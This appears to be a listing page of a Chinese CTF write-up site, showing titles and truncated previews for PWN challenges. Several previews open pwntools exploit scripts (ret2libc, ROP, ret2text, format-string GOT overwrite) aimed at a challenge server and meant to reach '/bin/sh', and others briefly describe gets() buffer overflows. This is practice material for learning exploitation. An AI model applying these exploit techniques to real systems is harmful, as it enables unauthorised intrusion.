-
Win0x3
frompwnimport*host='49.232.142.230'port=10684p=remote(host,port)elf=ELF("./pwn")rop=ROP(elf)ret=rop.find_gadget(['ret']).addressp.recvuntil(b'challenge.')leak=int(p.recv(14),16)log.info(f"leak-->{h...
- PWN
- 21天前
-
EzWinner
frompwnimport*fromLibcSearcherimport*host='49.232.142.230'port=14187p=remote(host,port)elf=ELF("./pwn")rop=ROP(elf)p.recvuntil('wisely:')win=int(p.recv(14),16)success('win=%#x',win)main_addr=win-0x128...
- PWN
- 1月前
-
ret2libc
frompwnimport*host='49.232.142.230'port=10930p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')libc=ELF('./libc.so.6')main=elf.sym['main']rop=ROP(elf)rdi=rop.find_gadget(['poprdi']).addressre...
- PWN
- 2月前
-
rop64
frompwnimport*host='49.232.142.230'port=14014p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')rop=ROP(elf)offset=0x30-0x8rdi=rop.find_gadget(['poprdi','ret']).addressbinsh=next(elf.search('/...
- PWN
- 2月前
-
ret2text
frompwnimport*host='49.232.142.230'port=16954p=remote(host,port)elf=ELF('./pwn2')rop=ROP(elf)ret=rop.find_gadget(['ret']).addressshell=elf.sym['foo']p.recvuntil('exactly!\n')payload=b'a'*(0x70+0x8)+p6...
- PWN
- 2月前
-
rop32
frompwnimport*host='49.232.142.230'port=11277p=remote(host,port)p.recvuntil('Go!!!\n')elf=ELF('./pwn')binsh=next(elf.search('/bin/sh'))payload=b'a'*(0x1c+0x4)+p32(0x80491E7)+p32(binsh)p.sendline(paylo...
- PWN
- 2月前
-
babyfmt
frompwnimport*host='49.232.142.230'port=17264p=remote(host,port)context(arch='i386',log_level='debug',os='linux')elf=ELF("./pwn")key=elf.sym['backdoor']got=elf.got['read']payload=fmtstr_payload(11,{go...
- PWN
- 2月前
-
栈溢出
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- PWN
- 3月前
-
stack-wp
frompwnimport*host=''port= p=remote(host,port)#p=process('./pwn')elf=ELF('./pwn')rop=ROP('./pwn')ret=rop.find_gadget(['ret']).addressp.sendlineafter('name?\n','1')backdoor=elf.sym['shell']offset=...
- PWN
- 3月前
-
Calling Convention 64
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 5月前
-
Calling Convention 32
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 5月前
-
Basic ret2libc WP
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
3 金币
- PWN
- 8月前
-
B0F0-[HackINI-2022]
下载附下载附件,一个无后缀文件,推测一般是linux可执行文件,在kali尝试运行,发现运行逻辑为输入一个字符串然后回显固定数字启动场景,给了一个nc连接,连接发现运行逻辑与附件相同把程序放进IDA反编译,发现主要运行逻辑在main函数,注意到该函数使用gets函数进行字符串输入,随后对局部变量进行输出并比较,需要修改为特定值,考虑利用缓冲区溢出漏洞s的长度为128字节,通过反编译代码注释里给出的...
- PWN
- 10月前
-
B0F1-[HackINI-2022]
下载附件,一个无后缀文件,推测一般是linux可执行文件,在kali尝试运行,发现运行逻辑为输入昵称回显昵称启动场景,给了一个nc连接,连接发现运行逻辑与附件相同把程序放进IDA分析,发现主要运行逻辑在say_my_name函数,注意到该函数用了gets函数,同时注意到程序有方法名为open_shell考虑构造缓冲区溢出访问open_shell函数,注意到以下片段s=byteptr-1Chleae...
- PWN
- 10月前
-
[HackINI-2021][PWN] WWW writeup(附脚本)
一、静态分析用ida打开题目进行分析,看看主函数:主函数首先告诉了你printf()函数在libc库中的地址,然后将输入的内容读取到buf变量中。在执行完www()函数后,执行了puts()函数并且将buf作为了参数。接下来分析www()函数干了什么注意红框这里,第一个红框里表示将我们输入的Where值通过10进制解析为数字,并将其作为变量v1的地址。第二个红框表示我们输入的What值同样的方法解...
- PWN
- 1年前
-
baby-pwn
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
2 金币
- PWN
- 1年前
-
special_ROP的writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 1年前
-
Message Board的writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 1年前
-
No Way Out的writeup
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 1年前
-
[NUAACTF-2017]hello_pwn
***收费WriteUP请购买后查看,VIP用户可免费查看***
-
1 金币
- PWN
- 1年前